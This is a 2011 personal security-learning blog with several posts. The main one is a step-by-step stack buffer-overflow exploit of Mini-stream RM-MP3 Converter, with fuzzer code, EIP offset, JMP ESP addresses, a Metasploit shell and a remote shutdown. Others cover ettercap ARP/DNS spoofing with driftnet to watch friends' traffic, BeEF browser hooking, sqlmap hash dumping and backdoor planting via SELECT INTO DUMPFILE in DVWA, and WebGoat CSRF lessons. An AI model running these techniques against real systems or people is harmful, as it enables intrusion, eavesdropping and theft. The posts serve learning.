Sunday, December 4, 2011

reverse enginnering Mini-stream RM-MP3 Converter (no SEH)

-->
target : Mini-stream RM-MP3 Converter
tools : python, ollydbg/Immunity Debugger, pattern_create, pattern_offset
OS : windows XP sp 2

-->
SS target :
-->
fuzzer :

hex = "http://."+"\x41" * 18000 #http://. To load file \x41
f=open("semangka.pls","w") #make file semangka.pls
f.write(hex)
f.close()

-->
step by step :
  1. install application in windows, and running Mini-stream RM-MP3 Converter and ollydbg.
  2. Attach that application in ollydbg.
  3. Load semangka.pls and this is the result :










    4. now, we must find much buffer in EIP, we can modification our fuzzer :
     

    5. after then running our fuzzer, and we get :








6. now we use pattern_offset like this :





7. and this is modification our fuzzer :









8. and this is the result :




address register of EIP as DEADBEEF, so the conclude is register EIP need 17416+8 to concern stack. And if stack can overwrite, we can to contempt payload in stack. So we must modif again our fuzzer.
9. It's new modif fuzzer :






first hex is upload \x90 * 17416, and second hex is overwrite address of EIP as DEADBEEF,thrid hex is to entrust command no operations \x90 *(17424-long of hex before this hex), and fourth hex is upload character C *(20000-long of hex before this hex). And this is the SS :







10. now we ust find command JMP ESP to sorcery on EIP to access PAYLOAD in buffer memory.
11.The step to find JMP ESP is open executable modules, and choose library file who can use to EIP register to enter into stack. In this case, we use user32.dll. double click user32.dll, so it will be open new window. And right click to search command JMP ESP.
12. and we get JMP ESP command, so we can write address of JMP ESP(77D8AF0A) to change DEADBEEF.
13. And this is the script our new fuzzer :

--> -->






14. ok, we can try again to fuzzer the application, but it's not our hope, the fuzzer can't direct in stack in memory, so we can try shell32.dll to find address of JMP ESP. open the executable modules choose shell32.dll, and find address of JMP ESP. JMP ESP address at 7CA58265
15. so, we must modif again our fuzzer, like this :






16. now we can restart the application, and running our fuzzer. And we can see that fuzzer can direct in stack memory :










17. now we can generate payload with use metasploit. And modif our fuzzer with payload from metasploit :













18. running the application without ollydbg, and load fuzzer. after we are upload fuzer, the application will be error :









19. open konsole and enter command telnet 192.168.56.101 4444.








20. so windows can we are control like this :







and the result is windows will be shutdown in 30 second :











and FINISHED :D
-=CMIIW=-
-->

Thursday, September 29, 2011

combine drifnet and ettercap

  what you see?? because it was too dizzy to learn, I decided to play around for a moment. in linux backtrack, there is a very exciting tool. the name of the tool is driftnet. with a driftnet, we could see the activity of our friends are just busy skating in the virtual world.
   
  let's do it. :P
first time, i open and edit etter.dns, don't forget to change your ip in there. after finished to edit etter.dns, let's get out our guns. :D


in linux backtrack, driftnet quandary di privilege escalation. but don't forget to enable ettercap. in terminal we can type "ettercap -T -q -M arp -i wlan0 -P dns_spoof //" (if you connect the network with LAN, wlan0 can change with eth0).
ok, let's go to attack.. :D

type "driftnet -i wlan0 -v" to active a drifnet. waiting for a minutes, and taratatataaaaaaaaaa....

-=CMIIW=-

Wednesday, September 28, 2011

"beef" social engineering tools

mendengar kata beef, yang langsung terpikir di benak adalah daging sapi (hm..enak :D).. tapi beef yang ini sangat berbeda, karena beef yang ini untuk exploit browser kita. kita bisa tahu apa yang target buka.
langsung kita mulai saja :


di dalam menu backtrack kita bisa temukan di exploitation tools ==> social engineering tools ==> beef XSS frame work ==> beef.


disitu kita akan mendapat script yang bisa kita taruh di web kita :).  saya memasang ini di sebuah hostingan untuk pembelajaran, setelah saya masukan ke index.html, kemudian saya membuka http://127.0.1.1:3000/ui/panel (bisa di ganti alamat ip kita/di sesuaikan). berikut ini kita tampilan beef :


-=CMIIW=-



Saturday, September 24, 2011

snort alert for system

for this part, we will learn about snort. if using backtrack 5 r1, we can find snort in menu backtrack => services => snort services.

first, start snort. after start snort, open terminal, and type "pico /etc/snort/snort.conf "



now, we can edit like this :

edit var HOME_NET any, to be like this var HOME_NET "your ip".
to finish, press "ctrl+x", "y" and press "enter".

now we can run snort.
in terminal we can type "snort -i eth0 -q -c /etc/snort/snort.conf -A console" if we use wireless, we can change "eth0" with "wlan0".

our alarm ready to "ring".
the respond if there is an attacker :

-=CMIIW=-






Sunday, July 24, 2011

SQL DUMFILE

web vulner : http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=%27&Submit=Submit#
and i tried to type in sqlmap :
root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.102/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie='PHPSESSID=ahh7j1bsrtrs5qtjn8tgpcp4g2; security=low' --dbs

then i get :
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL >= 5.0.0
[11:55:00] [INFO] fetching database names
available databases [14]:
[*] abal2
[*] auracms
[*] auracms1
[*] cdcol
[*] dvwa
[*] information_schema
[*] joomla
[*] joomla1
[*] mysql
[*] phpmyadmin
[*] test
[*] upload
[*] wordpress
[*] wordpress2

after type :

root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie="PHPSESSID=lp7qif2ecvd2lod7rp3unddfs1; security=low" --password

and then i get :

web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5
[11:56:26] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[11:56:29] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[11:56:29] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL


now, i have 2 user, first pma, and second root, with no password.


after i get password and user mysql, i login into sql, wth url :
192.168.56.102/phpmyadmin
 then i create the database with name : bd
and i create the table for upload

second i create table for form :
after create database and table, results can be seen like this :
then i insert the syntax sql like this :
for dump the file, type :
1. select * into dumpfile '/opt/lampp/htdocs/kotak.html' from kotak;
2. select * into dumpfile '/opt/lampp/htdocs/unggah_file.php' from unggah_file;

 it's finished for upload backdoor.
192.168.56.102/kotak.html

but any script error. 

-=CMIIW=-

Tuesday, July 19, 2011

the difference between socks 4, and socks 5

SOCKS is a standard protocol, designed to handle TCP traffic through proxy servers. Currently, there are two implementations of the SOCKS protocol is used, the SOCKS version 4 (SOCKS4) and SOCKS version 5 (SOCKS5). The main difference between the two versions is the SOCKS5 provide additional security through authentication.  
SOCKS5 TCP is compatible with most applications. It also provides a basic firewall capabilities, because it authenticates the incoming and outgoing packets and can provide network address translation (NAT).

CMIIW

Wednesday, July 13, 2011

what is htaccess

when we open a web page, of course, we've opened a web page that looks "404 Error" or "can not find the page"

Here are some of functions. Htaccess:
- Mem-protection Folders / Protect Folder with password
- Forward visitors to your website with automatic
- Create a page of your own error message display
- Reject the visitors with certain IP addresses
- Change your file extension
- Only allow certain visitors by IP Address
- Allow / Reject list directory

Monday, July 11, 2011

web and system

Now, I am learning into a web, put the backdoor, and exploit the system.
there is a lack of web vulnerabilities in both the file upload, the upload feature is already filtered, so it can only upload jpeg files.
I use Burp suite, then to intercept and replace it, so in addition to jpeg files can be uploaded.
backdoor.php I upload, so that the web is already my the backdoor.
then I go into the backdoor, and try to exploit the system.


I am very much a reference, using Exploitation in www.exploit-db.com, etc.. I tried to use various exploits to exploit to the kernel, and it turns out, the kernel of the system is already in the patch, making it more likely for her exploits of the kernel is very small.

My suggestion: in exploiting system, not just the kernel that can exploit, but could be from the application side, and its developer.
  

Sunday, July 10, 2011

PHP SUHOSIN

Suhosin is an advanced protection system for PHP installations. designed for
protect servers and users of the defects that are recognized or unrecognized
in PHP applications and the PHP core. Suhosin comes in two parts
independent, can be used separately or combined.

Patches and the Suhosin extension can be downloaded at http://www.hardened-php.net/suhosin/download.html


installation
Preparation
If you want to install PHP with Suhosin-Patch you must first

doing some preparatory steps.

 
Step 1: installation signaturekey hardened-PHP Project
First you grab a copy of darihttp: / / www.harde php.ne ne d-t / d ne harde-
php-signature-key.asc and import it into your keychain GNU Privacy Guard
 


#> gpg --import < hardened-php-signature-key.asc
gpg: /root/.gnupg/trustdb.gpg: trust-db erzeugt
gpg: key 0A864AA1: public key "Hardened-PHP Signature Key" imported
gpg: Anzahl insgesamt bearbeiteter Schlüssel: 1
gpg:
importiert: 1
 
Step 2: download and check the necessary files

Now it's time to grab a copy of the PHP tarball newest and latest version of suhosin-patch. In addition, you must obtain a digital signature (*. sig) files. You can grab all of this in http://www.hardened-php.net/suhosin/download.html


As a first precaution you can check the MD5 hash of the file
download of the people you find on the download page

#> Md5sum php-5.1.4.tar.bz2
66a806161d4a2d3b5153ebe4cd0f2e1c php-5.1.4.tar.bz2
#> Md5sum suhosin-patch-5.1.4-0.9.0.patch.gz
 
ea9026495c4ce34a329fd0a87474f1ba suhosin-patch-5.1.4-0.9.0.patch.gz

Step 3: Unpacking and Patching
You must now unpack the PHP tarball, gunzip patchfile and then
apply the patch.

#> Tar-xfj php-5.1.4.tar.bz2
#> Gunzip suhosin-patch-5.1.4-0.9.0.patch.gz
#> Cd php-5.1.4
#> Patch-p 1-i ../suhosin-patch-5.1.4-0.9.0.patch
     

Wednesday, June 29, 2011

CSRF Prompt By-Pass and CSRF Token By-Pass

CSRF Prompt By-Pass

in this chapter, continue from the earlier chapter, I learn abot CSRF promp By-pass.
This is directions from CSRF Prompt by-Pass :

“Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple malicious requests: the first to transfer funds, and the second a request to confirm the prompt that the first request triggered. The URL should point to the CSRF lesson with an extra parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever receives this email and happens to be authenticated at that time will have his funds transferred. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu. “

SS :

 


 
I tried to be know what the directions mean, like before chapter, I tried to copy the shortcut from the left hand menu.
http://127.0.0.1/webgoat/attack?Screen=82&menu=900” and I think in this chapter, I must to add transferFouds=4000 in this URL.

The result :
SS :








 
SS result :





 
after I see the result, I just a thin smile, the input that was my input is a URL, so I must input to the URL browser, like this :
 

and the result is :

 








 
then I click confirm :




 
CSRF Token By-Pass
 
there was a directions :
“Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious request to transfer funds. To successfully complete you need to obtain a valid request token. The page that presents the transfer funds form contains a valid request token. The URL for the transfer funds page is the same as this lesson with an extra parameter "transferFunds=main". Load this page, read the token and append the token in a forged request to transferFunds. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.”
SS :













after to be know a directions, I doing like CSRF Prompt By-Pass' chapter.  But the differences of this chapter is :
I tried :

and the result is :








and after I click sub query,
SS:




this is my report
CMIIW